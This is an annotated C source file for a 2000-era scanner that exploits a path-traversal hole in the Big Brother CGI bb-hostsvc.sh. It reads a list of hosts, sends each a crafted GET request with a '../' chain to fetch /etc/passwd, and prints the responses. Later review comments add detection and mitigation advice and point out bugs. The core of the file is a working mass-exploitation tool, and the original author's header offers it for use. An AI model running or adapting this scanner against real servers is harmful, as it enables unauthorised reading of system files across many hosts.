/*
 * 2000-07-11
 *
 * Ripped from phfscan.c
 * Big Brother Vulnerability scanner.
 * Scans for /cgi-bin/bb-hostsvc.sh.
 * If it exists you might be able to read files from
 * the system. Good luck.
 *
 * Author: Safety@IRCnet who also discovered the bug.
 *         Safety@LinuxMail.ORG
 *
 * Credits: #roothat, #vastervik, #smile, Loki, crimson, self,
 *          Bjurr, Metoo, and everyone else who think they should
 *          be on this list.
 *
 * Special Thanks goes to Loki who are going to host and design
 * my homepage.
 *
 * Usage:
 *
 * ./bbscan < hostlist > outputfile
 *
 * Reviewer summary (what the code below does):
 *   - reads one host name per line from stdin and echoes it to fd 1;
 *   - resolves it, connects to TCP port 80 under a 10 second alarm;
 *   - sends a single GET for /cgi-bin/bb-hostsvc.sh whose HOSTSVC
 *     parameter is a chain of "../" components ending in /etc/passwd;
 *   - copies whatever the server returns to fd 1.
 *
 * Defensive notes:
 *   - Detection: the request is visible in web server access logs as a
 *     GET for /cgi-bin/bb-hostsvc.sh with "../" sequences in HOSTSVC.
 *     The request line carries no HTTP version and is terminated with
 *     bare "\n\n" rather than CRLF, which also sets it apart from
 *     ordinary browser traffic.
 *   - Mitigation: the CGI must not use HOSTSVC as a path without
 *     validation; reject values containing "/" or "..", or
 *     canonicalise and confine them to the intended data directory.
 *     Run the CGI with the least privilege that works and remove the
 *     script where it is not needed.
 */

/*
 * NOTE(review): the header names were lost when this listing was
 * extracted (the <...> part of every directive is missing). The bare
 * directives are kept exactly as found; the file does not compile in
 * this form.
 */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#ifdef LINUX
#include
#endif
#include
#include
#include
#include
#include
#include

/*
 * Connect-timeout flag. main() sets it to 1 before each connect();
 * the SIGALRM handler Call() clears it to 0.
 * NOTE(review): it is written from a signal handler but declared as a
 * plain int, not volatile sig_atomic_t.
 */
int FLAG = 1;

/*
 * SIGALRM handler: records that the alarm fired by clearing FLAG.
 * signo is unused.
 * NOTE(review): declared to return int but has no return statement.
 */
int Call(int signo) { FLAG = 0; }

/*
 * Entry point. argc and argv are not used; all input comes from stdin.
 * Always returns 0.
 * NOTE(review): declared without a return type (implicit int).
 */
main (int argc, char *argv[]) {
  /* buffer, serv_len, len, c and outfd are declared but never used. */
  char host[100], buffer[1024], hosta[1024],FileBuf[8097];
  int outsocket, serv_len, len,X,c,outfd;
  struct hostent *nametocheck;
  struct sockaddr_in serv_addr;
  struct in_addr outgoing;
  /*
   * The fixed request sent to every host. The leading "/" plus the
   * run of "../" components is the traversal pattern to look for in
   * access logs and to reject in the CGI's input validation.
   */
  char bbvuln[]="GET /cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/passwd\n\n";

  /* Reads at most 99 characters per line although hosta holds 1024. */
  while(fgets(hosta,100,stdin)) {
    if(hosta[0] == '\0') break;
    /*
     * Drops the last character, presumably the newline kept by
     * fgets(). NOTE(review): a line without a trailing newline (final
     * line of the file, or a line cut at 99 characters) loses a real
     * character instead.
     */
    hosta[strlen(hosta) -1] = '\0';
    /* Echo the host name to fd 1 so the output can be attributed. */
    write(1,hosta,strlen(hosta)*sizeof(char));
    write(1,"\n",sizeof(char));

    /* NOTE(review): the socket() result is not checked. */
    outsocket = socket (AF_INET, SOCK_STREAM, 0);
    memset (&serv_addr, 0, sizeof (serv_addr));
    serv_addr.sin_family = AF_INET;

    /*
     * NOTE(review): the gethostbyname() result is dereferenced below
     * without a NULL check, so a failed lookup is a NULL pointer
     * dereference.
     */
    nametocheck = gethostbyname (hosta);

    /* Ugly stuff to get host name into inet_ntoa form */
    (void *) memcpy (&outgoing.s_addr, nametocheck->h_addr_list[0], sizeof (outgoing.s_addr));
    /* Round trip: binary address -> dotted string -> binary address. */
    strncpy(host, inet_ntoa (outgoing), 100);

    serv_addr.sin_addr.s_addr = inet_addr (host);
    serv_addr.sin_port = htons (80);

    /* Arm a 10 second alarm around connect(); Call() clears FLAG if it fires. */
    signal(SIGALRM,Call);
    FLAG = 1;
    alarm(10);
    X=connect (outsocket, (struct sockaddr *) &serv_addr, sizeof (serv_addr));
    alarm(0);

    /* Proceed only if connect() succeeded and the alarm did not fire. */
    if(FLAG == 1 && X==0){
      write(outsocket,bbvuln,strlen(bbvuln)*sizeof(char));
      /*
       * Copy the response to fd 1 until read() returns 0.
       * NOTE(review): a read() error (-1) is not distinguished from
       * data; -1 is passed to write() as the length and the loop
       * continues.
       */
      while((X=read(outsocket,FileBuf,8096))!=0) write(1,FileBuf,X);
    }
    close (outsocket);
  }
  return 0;
}
/* www.hack.co.za [18 July 2000]*/